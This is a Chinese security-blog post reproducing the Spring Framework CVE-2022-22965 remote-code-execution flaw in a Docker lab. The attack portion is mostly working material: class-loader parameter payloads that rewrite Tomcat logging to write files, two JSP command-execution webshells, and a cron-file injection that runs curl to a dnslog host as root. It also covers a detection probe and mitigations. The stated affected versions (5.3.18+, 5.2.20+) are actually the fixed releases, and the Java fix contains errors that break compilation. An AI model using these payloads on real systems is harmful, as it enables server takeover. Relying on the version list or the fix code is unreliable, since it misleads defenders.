CVE-2022-22965 Spring框架漏洞复现检测

admin 2022年4月7日20:34:41安全文章评论407 views5307字阅读17分41秒阅读模式
CVE-2022-22965 Spring框架漏洞复现检测
点击上方“蓝字”,发现更多精彩。

0x00 漏洞介绍

CVE-2022-22965 Spring框架漏洞复现检测

2022年3月30日,Spring框架曝出RCE 0day漏洞,国家信息安全漏洞共享平台(CNVD)已收录了Spring框架远程命令执行漏洞(CNVD-2022-23942),考虑到Spring框架的广泛应用,漏洞被评级为危险。

通过该漏洞可写入webshell以及命令执行。在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件。


0x01 漏洞检测条件

1. Apache Tomcat作为Servlet容器;

2. 使用JDK9及以上版本的Spring MVC框架;

3. Spring框架以及衍生的框架spring-beans-*.jar文件或者存在

CachedIntrospectionResults.class



0x02 漏洞影响范围

1、JDK

    • JDK 9+


2、Spring Framework

    • 5.3.18+

    • 5.2.20+


0x03 漏洞复现检测

复现环境:Centos7(192.168.110.133)


docker pull vulfocus/spring-core-rce-2022-03-29:latest


CVE-2022-22965 Spring框架漏洞复现检测


docker run -itd -p 8090:8080 vulfocus/spring-core-rce-2022-03-2


CVE-2022-22965 Spring框架漏洞复现检测


访问看看


CVE-2022-22965 Spring框架漏洞复现检测


利用原理(这里不放分析代码的图了):

利⽤class对象构造利⽤链,对Tomcat的日志配置进行修改,然后,向⽇志中写⼊shell。


完整的检测利用链:

class.module.classLoader.resources.context.parent.pipeline.first.pattern=构建文件的内容
class.module.classLoader.resources.context.parent.pipeline.first.suffix=修改tomcat日志文件后缀
class.module.classLoader.resources.context.parent.pipeline.first.directory=写入文件所在的网站根目录
class.module.classLoader.resources.context.parent.pipeline.first.prefix=写入文件名称
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=文件日期格式(实际构造为空值即可)


构造payload

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{test}i  #%{xxx}i 请求headers的信息class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jspclass.module.classLoader.resources.context.parent.pipeline.first.directory=/app/tomcat/webapps/ROOT/class.module.classLoader.resources.context.parent.pipeline.first.prefix=testfileclass.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=




发送payload:

GET发送(需要分五次请求,依次发送有时候spring会出问题)

http://127.0.0.1:8090/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Btest%7Dihttp://127.0.0.1:8090/?class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsphttp://127.0.0.1:8090/?class.module.classLoader.resources.context.parent.pipeline.first.directory=%2Fapp%2Ftomcat%2Fwebapps%2FROOT%2Fhttp://127.0.0.1:8090/?class.module.classLoader.resources.context.parent.pipeline.first.prefix=testfilehttp://127.0.0.1:8090/?class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=



POST发送(数据包格式 Content-Type: application/x-www-form-urlencoded,推荐这种方式

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Btest%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=%2Fapp%2Ftomcat%2Fwebapps%2FROOT%2F&class.module.classLoader.resources.context.parent.pipeline.first.prefix=testfile&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=


CVE-2022-22965 Spring框架漏洞复现检测



然后任意⼀个请求,在请求头中添加一个name为test的值,即可写⼊webshell:

test:<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>



CVE-2022-22965 Spring框架漏洞复现检测



看看漏洞环境下的webshell


CVE-2022-22965 Spring框架漏洞复现检测


浏览器访问下:

报500错误,文件存在


CVE-2022-22965 Spring框架漏洞复现检测


因为是无回显的一句话,我们可以直接弹shell,这里用dnslog去判断是否成

功。

curl 1pnicr.dnslog.cn

CVE-2022-22965 Spring框架漏洞复现检测



dnslog:


CVE-2022-22965 Spring框架漏洞复现检测



后面又换了一个带回显的webshell:

<%    if("023".equals(request.getParameter("pwd"))){        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();        int a = -1;        byte[] b = new byte[2048];        out.print("<pre>");        while((a=in.read(b))!=-1){            out.println(new String(b));        }        out.print("</pre>");    }%>


执行效果


CVE-2022-22965 Spring框架漏洞复现检测


0x05 任务计划反弹shell

这种是针对实际情况获取不到目录时候尝试检测(这里容器没带任务计划就不截图了)

class.module.classLoader.resources.context.parent.pipeline.first.pattern=*%20*%20*%20*%20*%20root%20curl%20xxx.dnslog.cnclass.module.classLoader.resources.context.parent.pipeline.first.suffix=class.module.classLoader.resources.context.parent.pipeline.first.directory=/etc/cron.d/class.module.classLoader.resources.context.parent.pipeline.first.prefix=crontestclass.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=


构造POST数据包:

class.module.classLoader.resources.context.parent.pipeline.first.pattern=*%20*%20*%20*%20*%20root%20curl%20xxx.dnslog.cn&class.module.classLoader.resources.context.parent.pipeline.first.suffix=&class.module.classLoader.resources.context.parent.pipeline.first.directory=/etc/cron.d/&class.module.classLoader.resources.context.parent.pipeline.first.prefix=crontest&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=


0x06 无害检测方式

构造POST数据包(数据包格式 Content-Type: application/x-www-form-urlencoded):

class.module.classLoader.DefaultAssertionStatus=test默认断言状态的值只能为True/False,如为其他就会报错.可根据此处写POC检测


正常:

CVE-2022-22965 Spring框架漏洞复现检测



报错:

CVE-2022-22965 Spring框架漏洞复现检测


0x07 漏洞修复方式

(一) WAF防护

在WAF等网络防护设备上,根据实际部署业务的流量情况,实现对class.*, Class.*,*.class.*,*.Class.* 等字符串的规则过滤,并在部署过滤规则后,对业务运行情况进行测试,避免产生额外影响。

(二) 临时修复措施

需同时按以下两个步骤进行漏洞的临时修复:

1.在应用中全局搜索@InitBinder注解,看看方法体内是否调用dataBinder.setDisallowedFields方法,如果发现此代码片段的引入,则在原来的黑名单中,添加{"class.*","Class.*","*.class.*","*.Class.*"}。(注:如果此代码片段使用较多,需要每个地方都追加)

2. 在用系统的项目包下新建以下全局类,并保证这个类被Spring 加载到(推荐在Controller所在的包中添加)。完成类添加后,需对项目进行重新编译打包和功能验证测试,并重新发布项目。

import org.springframework.core.annotation.Order;import org.springframework.web.bind.WebDataBinder;import org.springframework.web.bind.annotation.ControllerAdvice;import org.springframework.web.bind.annotation.InitBinder;@ControllerAdvice@Order(10000)public class GlobalControllerAdvicc{@InitBinderpublic void setAllowedFields(webdataBinder dataBinder){String[]abd=new string[]{"class.*","Class.*","*.class.*","*.Class.*"};            dataBinder.setDisallowedFields(abd);}}

(三) 根据官方的意思是更新最新版

https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement



内容仅供学习及自我检测修复,根据此文造成的任何后果均由用户个人承担。




我知道你在看
CVE-2022-22965 Spring框架漏洞复现检测


原文始发于微信公众号(米瑞尔信息安全):CVE-2022-22965 Spring框架漏洞复现检测

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月7日20:34:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  CVE-2022-22965 Spring框架漏洞复现检测 http://cn-sec.com/archives/884659.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: